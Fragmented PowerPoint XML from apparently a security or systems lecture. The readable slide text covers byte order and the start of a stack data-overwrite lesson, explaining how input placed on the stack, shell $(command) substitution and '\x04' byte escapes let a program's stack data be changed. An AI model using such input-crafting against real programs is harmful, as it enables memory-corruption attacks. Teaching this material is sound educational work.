              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>largest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> memory address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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>least</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> significant byte               at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>smallest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> memory address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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144EC-5CD6-4894-9035-6A37896D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BB51FA-9CCD-4822-86D5-B742CC19C169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300760" y="1918596"/>
            <a:ext cx="564995" cy="1338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879432-F868-4E9E-9A92-CEAC63E3D49B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300760" y="2171078"/>
            <a:ext cx="564995" cy="1338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619112-5815-49FC-91AD-4F9805FE459D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300760" y="2750421"/>
            <a:ext cx="564995" cy="1338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51F285-8451-494A-90CF-0F5F66722700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300760" y="3005467"/>
            <a:ext cx="564995" cy="1338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79845-2721-4182-87E2-07D62231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40" y="3040073"/>
            <a:ext cx="1885085" cy="1682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65AA55-7B77-4F0E-B02E-B470D1BD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96" y="3038900"/>
            <a:ext cx="1886400" cy="1683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518D5C-F01D-4ADA-8F2E-246FE978A0E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360125" y="4459313"/>
            <a:ext cx="2423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https://en.wikipedia.org/wiki/Endianness</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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0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15D095F-4882-452D-B410-B17117665864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266245" y="1790914"/>
            <a:ext cx="6466468" cy="327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2BD2-65FB-4D8D-9F9B-C6A4C041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Change program’s data in the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8A2A-89E2-4C65-A01F-D6FCF039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Assuming the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US" dirty="0"/>
              <a:t> (can be obtained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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The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is given in the beginning of the input so that it is stored on the stack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$(command): Command substitution. Allows the output of the command to replace the command itself.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“\x04”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : Indicates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“04”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an actual number and not as two ascii characters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7549-B42F-4669-9574-5B237138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D694DBF-1022-4476-A44D-8BEE58F10EA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92237" y="1872632"/>
            <a:ext cx="6223000" cy="203200"/>
            <a:chOff x="1392237" y="2051050"/>
            <a:chExt cx="6223000" cy="203200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="350" name="Freeform 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B886963-CBD4-40E1-9092-BF1BDC2ED9F0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392237" y="2114550"/>
              <a:ext cx="66675" cy="90488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8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1" name="Freeform 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB92C304-E76F-4B80-B819-C6A28AD93D65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479550" y="2114550"/>
              <a:ext cx="69850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2" name="Freeform 213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F653FFDF-68DA-46B1-99BD-08800138E34C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570037" y="2114550"/>
              <a:ext cx="69850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3" name="Freeform 214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82341004-33D7-4488-87FA-80A52DFF4EE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655762" y="2079625"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 279 h 307"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 304 h 307"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 304 h 307"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 307"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 307"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 307"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 20 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 307"/>
                <a:gd name="T16" fmla="*/ 138 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 307"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 15 h 307"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 307"/>
                <a:gd name="T22" fmla="*/ 160 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 307"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 307"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 86 h 307"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 197 h 307"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 307 h 307"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 279 h 307"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 172 h 307"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 307"/>
                <a:gd name="T38" fmla="*/ 99 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 307"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 197 h 307"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 307"/>
                <a:gd name="T44" fmla="*/ 160 w 237"/>
                <a:gd name="T45" fmla="*/ 17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7">
                  <a:moveTo>
                    <a:pt x="160" y="279"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="297"/>
                    <a:pt x="160" y="304"/>
                    <a:pt x="180" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="304"/>
                    <a:pt x="237" y="304"/>
                    <a:pt x="237" y="289"/>
                  </a:cubicBez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0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="94"/>
                    <a:pt x="123" y="86"/>
                    <a:pt x="102" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="86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5" y="307"/>
                    <a:pt x="146" y="294"/>
                    <a:pt x="160" y="279"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="235"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="99" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="241"/>
                    <a:pt x="34" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="149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4" name="Freeform 215">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2C55318-52DA-4E64-99C1-EB869D495073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747837" y="2078038"/>
              <a:ext cx="74613" cy="127000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 178 w 218"/>
                <a:gd name="T1" fmla="*/ 65 h 310"/>
                <a:gd name="T2" fmla="*/ 146 w 218"/>
                <a:gd name="T3" fmla="*/ 55 h 310"/>
                <a:gd name="T4" fmla="*/ 74 w 218"/>
                <a:gd name="T5" fmla="*/ 155 h 310"/>
                <a:gd name="T6" fmla="*/ 145 w 218"/>
                <a:gd name="T7" fmla="*/ 254 h 310"/>
                <a:gd name="T8" fmla="*/ 218 w 218"/>
                <a:gd name="T9" fmla="*/ 147 h 310"/>
                <a:gd name="T10" fmla="*/ 130 w 218"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 0 w 218"/>
                <a:gd name="T13" fmla="*/ 155 h 310"/>
                <a:gd name="T14" fmla="*/ 131 w 218"/>
                <a:gd name="T15" fmla="*/ 310 h 310"/>
                <a:gd name="T16" fmla="*/ 218 w 218"/>
                <a:gd name="T17" fmla="*/ 267 h 310"/>
                <a:gd name="T18" fmla="*/ 199 w 218"/>
                <a:gd name="T19" fmla="*/ 253 h 310"/>
                <a:gd name="T20" fmla="*/ 184 w 218"/>
                <a:gd name="T21" fmla="*/ 258 h 310"/>
                <a:gd name="T22" fmla="*/ 130 w 218"/>
                <a:gd name="T23" fmla="*/ 280 h 310"/>
                <a:gd name="T24" fmla="*/ 28 w 218"/>
                <a:gd name="T25" fmla="*/ 155 h 310"/>
                <a:gd name="T26" fmla="*/ 130 w 218"/>
                <a:gd name="T27" fmla="*/ 30 h 310"/>
                <a:gd name="T28" fmla="*/ 178 w 218"/>
                <a:gd name="T29" fmla="*/ 65 h 310"/>
                <a:gd name="T30" fmla="*/ 146 w 218"/>
                <a:gd name="T31" fmla="*/ 224 h 310"/>
                <a:gd name="T32" fmla="*/ 101 w 218"/>
                <a:gd name="T33" fmla="*/ 155 h 310"/>
                <a:gd name="T34" fmla="*/ 145 w 218"/>
                <a:gd name="T35" fmla="*/ 86 h 310"/>
                <a:gd name="T36" fmla="*/ 190 w 218"/>
                <a:gd name="T37" fmla="*/ 155 h 310"/>
                <a:gd name="T38" fmla="*/ 146 w 218"/>
                <a:gd name="T39" fmla="*/ 22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10">
                  <a:moveTo>
                    <a:pt x="178" y="65"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="64"/>
                    <a:pt x="162" y="55"/>
                    <a:pt x="146" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="55"/>
                    <a:pt x="74" y="98"/>
                    <a:pt x="74" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="214"/>
                    <a:pt x="108" y="254"/>
                    <a:pt x="145" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="254"/>
                    <a:pt x="218" y="233"/>
                    <a:pt x="218" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="115"/>
                    <a:pt x="218" y="0"/>
                    <a:pt x="130" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="0"/>
                    <a:pt x="0" y="65"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="244"/>
                    <a:pt x="61" y="310"/>
                    <a:pt x="131" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="310"/>
                    <a:pt x="218" y="282"/>
                    <a:pt x="218" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="253"/>
                    <a:pt x="204" y="253"/>
                    <a:pt x="199" y="253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="253"/>
                    <a:pt x="189" y="253"/>
                    <a:pt x="184" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="274"/>
                    <a:pt x="147" y="280"/>
                    <a:pt x="130" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="280"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="28" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="81"/>
                    <a:pt x="79" y="30"/>
                    <a:pt x="130" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="30"/>
                    <a:pt x="166" y="35"/>
                    <a:pt x="178" y="65"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146" y="224"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="224"/>
                    <a:pt x="101" y="194"/>
                    <a:pt x="101" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="113"/>
                    <a:pt x="124" y="86"/>
                    <a:pt x="145" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="86"/>
                    <a:pt x="190" y="115"/>
                    <a:pt x="190" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="196"/>
                    <a:pt x="167" y="224"/>
                    <a:pt x="146" y="22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5" name="Freeform 216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA39BA4E-089D-41EB-AA49-0C5C49F45DC4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833562" y="2079625"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 243"/>
                <a:gd name="T1" fmla="*/ 30 h 308"/>
                <a:gd name="T2" fmla="*/ 243 w 243"/>
                <a:gd name="T3" fmla="*/ 15 h 308"/>
                <a:gd name="T4" fmla="*/ 223 w 243"/>
                <a:gd name="T5" fmla="*/ 0 h 308"/>
                <a:gd name="T6" fmla="*/ 172 w 243"/>
                <a:gd name="T7" fmla="*/ 0 h 308"/>
                <a:gd name="T8" fmla="*/ 151 w 243"/>
                <a:gd name="T9" fmla="*/ 15 h 308"/>
                <a:gd name="T10" fmla="*/ 179 w 243"/>
                <a:gd name="T11" fmla="*/ 30 h 308"/>
                <a:gd name="T12" fmla="*/ 141 w 243"/>
                <a:gd name="T13" fmla="*/ 183 h 308"/>
                <a:gd name="T14" fmla="*/ 121 w 243"/>
                <a:gd name="T15" fmla="*/ 268 h 308"/>
                <a:gd name="T16" fmla="*/ 121 w 243"/>
                <a:gd name="T17" fmla="*/ 268 h 308"/>
                <a:gd name="T18" fmla="*/ 112 w 243"/>
                <a:gd name="T19" fmla="*/ 224 h 308"/>
                <a:gd name="T20" fmla="*/ 64 w 243"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 92 w 243"/>
                <a:gd name="T23" fmla="*/ 15 h 308"/>
                <a:gd name="T24" fmla="*/ 71 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 308"/>
                <a:gd name="T26" fmla="*/ 20 w 243"/>
                <a:gd name="T27" fmla="*/ 0 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 243"/>
                <a:gd name="T29" fmla="*/ 15 h 308"/>
                <a:gd name="T30" fmla="*/ 28 w 243"/>
                <a:gd name="T31" fmla="*/ 30 h 308"/>
                <a:gd name="T32" fmla="*/ 94 w 243"/>
                <a:gd name="T33" fmla="*/ 289 h 308"/>
                <a:gd name="T34" fmla="*/ 121 w 243"/>
                <a:gd name="T35" fmla="*/ 308 h 308"/>
                <a:gd name="T36" fmla="*/ 149 w 243"/>
                <a:gd name="T37" fmla="*/ 290 h 308"/>
                <a:gd name="T38" fmla="*/ 215 w 243"/>
                <a:gd name="T39" fmla="*/ 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8">
                  <a:moveTo>
                    <a:pt x="215" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="30"/>
                    <a:pt x="243" y="30"/>
                    <a:pt x="243" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="0"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="223" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="0"/>
                    <a:pt x="151" y="0"/>
                    <a:pt x="151" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="30"/>
                    <a:pt x="162" y="30"/>
                    <a:pt x="179" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="209"/>
                    <a:pt x="125" y="247"/>
                    <a:pt x="121" y="268"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="121" y="268"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="251"/>
                    <a:pt x="117" y="242"/>
                    <a:pt x="112" y="224"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="30"/>
                    <a:pt x="92" y="30"/>
                    <a:pt x="92" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="0"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="71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0" y="30"/>
                    <a:pt x="28" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="308"/>
                    <a:pt x="107" y="308"/>
                    <a:pt x="121" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="308"/>
                    <a:pt x="144" y="308"/>
                    <a:pt x="149" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21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6" name="Freeform 217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D256D89-EADA-4CC1-8700-A1A9D40E230E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924050" y="2079625"/>
              <a:ext cx="84138" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 136 w 244"/>
                <a:gd name="T1" fmla="*/ 120 h 304"/>
                <a:gd name="T2" fmla="*/ 123 w 244"/>
                <a:gd name="T3" fmla="*/ 167 h 304"/>
                <a:gd name="T4" fmla="*/ 122 w 244"/>
                <a:gd name="T5" fmla="*/ 167 h 304"/>
                <a:gd name="T6" fmla="*/ 72 w 244"/>
                <a:gd name="T7" fmla="*/ 12 h 304"/>
                <a:gd name="T8" fmla="*/ 48 w 244"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 20 w 244"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 0 w 244"/>
                <a:gd name="T13" fmla="*/ 15 h 304"/>
                <a:gd name="T14" fmla="*/ 26 w 244"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 26 w 244"/>
                <a:gd name="T17" fmla="*/ 274 h 304"/>
                <a:gd name="T18" fmla="*/ 0 w 244"/>
                <a:gd name="T19" fmla="*/ 289 h 304"/>
                <a:gd name="T20" fmla="*/ 20 w 244"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 61 w 244"/>
                <a:gd name="T23" fmla="*/ 304 h 304"/>
                <a:gd name="T24" fmla="*/ 81 w 244"/>
                <a:gd name="T25" fmla="*/ 289 h 304"/>
                <a:gd name="T26" fmla="*/ 54 w 244"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 54 w 244"/>
                <a:gd name="T29" fmla="*/ 36 h 304"/>
                <a:gd name="T30" fmla="*/ 55 w 244"/>
                <a:gd name="T31" fmla="*/ 36 h 304"/>
                <a:gd name="T32" fmla="*/ 94 w 244"/>
                <a:gd name="T33" fmla="*/ 161 h 304"/>
                <a:gd name="T34" fmla="*/ 107 w 244"/>
                <a:gd name="T35" fmla="*/ 195 h 304"/>
                <a:gd name="T36" fmla="*/ 122 w 244"/>
                <a:gd name="T37" fmla="*/ 203 h 304"/>
                <a:gd name="T38" fmla="*/ 139 w 244"/>
                <a:gd name="T39" fmla="*/ 192 h 304"/>
                <a:gd name="T40" fmla="*/ 189 w 244"/>
                <a:gd name="T41" fmla="*/ 36 h 304"/>
                <a:gd name="T42" fmla="*/ 190 w 244"/>
                <a:gd name="T43" fmla="*/ 36 h 304"/>
                <a:gd name="T44" fmla="*/ 190 w 244"/>
                <a:gd name="T45" fmla="*/ 274 h 304"/>
                <a:gd name="T46" fmla="*/ 163 w 244"/>
                <a:gd name="T47" fmla="*/ 289 h 304"/>
                <a:gd name="T48" fmla="*/ 183 w 244"/>
                <a:gd name="T49" fmla="*/ 304 h 304"/>
                <a:gd name="T50" fmla="*/ 224 w 244"/>
                <a:gd name="T51" fmla="*/ 304 h 304"/>
                <a:gd name="T52" fmla="*/ 244 w 244"/>
                <a:gd name="T53" fmla="*/ 289 h 304"/>
                <a:gd name="T54" fmla="*/ 218 w 244"/>
                <a:gd name="T55" fmla="*/ 274 h 304"/>
                <a:gd name="T56" fmla="*/ 218 w 244"/>
                <a:gd name="T57" fmla="*/ 30 h 304"/>
                <a:gd name="T58" fmla="*/ 244 w 244"/>
                <a:gd name="T59" fmla="*/ 15 h 304"/>
                <a:gd name="T60" fmla="*/ 224 w 244"/>
                <a:gd name="T61" fmla="*/ 0 h 304"/>
                <a:gd name="T62" fmla="*/ 196 w 244"/>
                <a:gd name="T63" fmla="*/ 0 h 304"/>
                <a:gd name="T64" fmla="*/ 169 w 244"/>
                <a:gd name="T65" fmla="*/ 20 h 304"/>
                <a:gd name="T66" fmla="*/ 136 w 244"/>
                <a:gd name="T67" fmla="*/ 12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4">
                  <a:moveTo>
                    <a:pt x="136" y="120"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="138"/>
                    <a:pt x="125" y="153"/>
                    <a:pt x="123" y="167"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="144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0" y="30"/>
                    <a:pt x="26" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="12" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="304"/>
                    <a:pt x="81" y="304"/>
                    <a:pt x="81" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="274"/>
                    <a:pt x="70" y="274"/>
                    <a:pt x="54" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="54" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="36"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="59"/>
                    <a:pt x="92" y="155"/>
                    <a:pt x="94" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="173"/>
                    <a:pt x="105" y="192"/>
                    <a:pt x="107" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="199"/>
                    <a:pt x="116" y="203"/>
                    <a:pt x="122" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="203"/>
                    <a:pt x="135" y="199"/>
                    <a:pt x="139" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="189"/>
                    <a:pt x="183" y="62"/>
                    <a:pt x="189" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="190" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="274"/>
                    <a:pt x="163" y="274"/>
                    <a:pt x="163" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="304"/>
                    <a:pt x="176" y="304"/>
                    <a:pt x="183" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="224" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="304"/>
                    <a:pt x="244" y="304"/>
                    <a:pt x="244" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="274"/>
                    <a:pt x="234" y="274"/>
                    <a:pt x="218" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="218" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="30"/>
                    <a:pt x="244" y="30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7" name="Freeform 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFCD2781-7D4B-4800-BC6C-6AE55443FA1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020887" y="2062163"/>
              <a:ext cx="69850" cy="158750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 117 w 203"/>
                <a:gd name="T1" fmla="*/ 209 h 388"/>
                <a:gd name="T2" fmla="*/ 171 w 203"/>
                <a:gd name="T3" fmla="*/ 263 h 388"/>
                <a:gd name="T4" fmla="*/ 117 w 203"/>
                <a:gd name="T5" fmla="*/ 317 h 388"/>
                <a:gd name="T6" fmla="*/ 117 w 203"/>
                <a:gd name="T7" fmla="*/ 209 h 388"/>
                <a:gd name="T8" fmla="*/ 87 w 203"/>
                <a:gd name="T9" fmla="*/ 202 h 388"/>
                <a:gd name="T10" fmla="*/ 87 w 203"/>
                <a:gd name="T11" fmla="*/ 318 h 388"/>
                <a:gd name="T12" fmla="*/ 36 w 203"/>
                <a:gd name="T13" fmla="*/ 278 h 388"/>
                <a:gd name="T14" fmla="*/ 44 w 203"/>
                <a:gd name="T15" fmla="*/ 261 h 388"/>
                <a:gd name="T16" fmla="*/ 22 w 203"/>
                <a:gd name="T17" fmla="*/ 239 h 388"/>
                <a:gd name="T18" fmla="*/ 0 w 203"/>
                <a:gd name="T19" fmla="*/ 263 h 388"/>
                <a:gd name="T20" fmla="*/ 87 w 203"/>
                <a:gd name="T21" fmla="*/ 349 h 388"/>
                <a:gd name="T22" fmla="*/ 87 w 203"/>
                <a:gd name="T23" fmla="*/ 367 h 388"/>
                <a:gd name="T24" fmla="*/ 102 w 203"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 117 w 203"/>
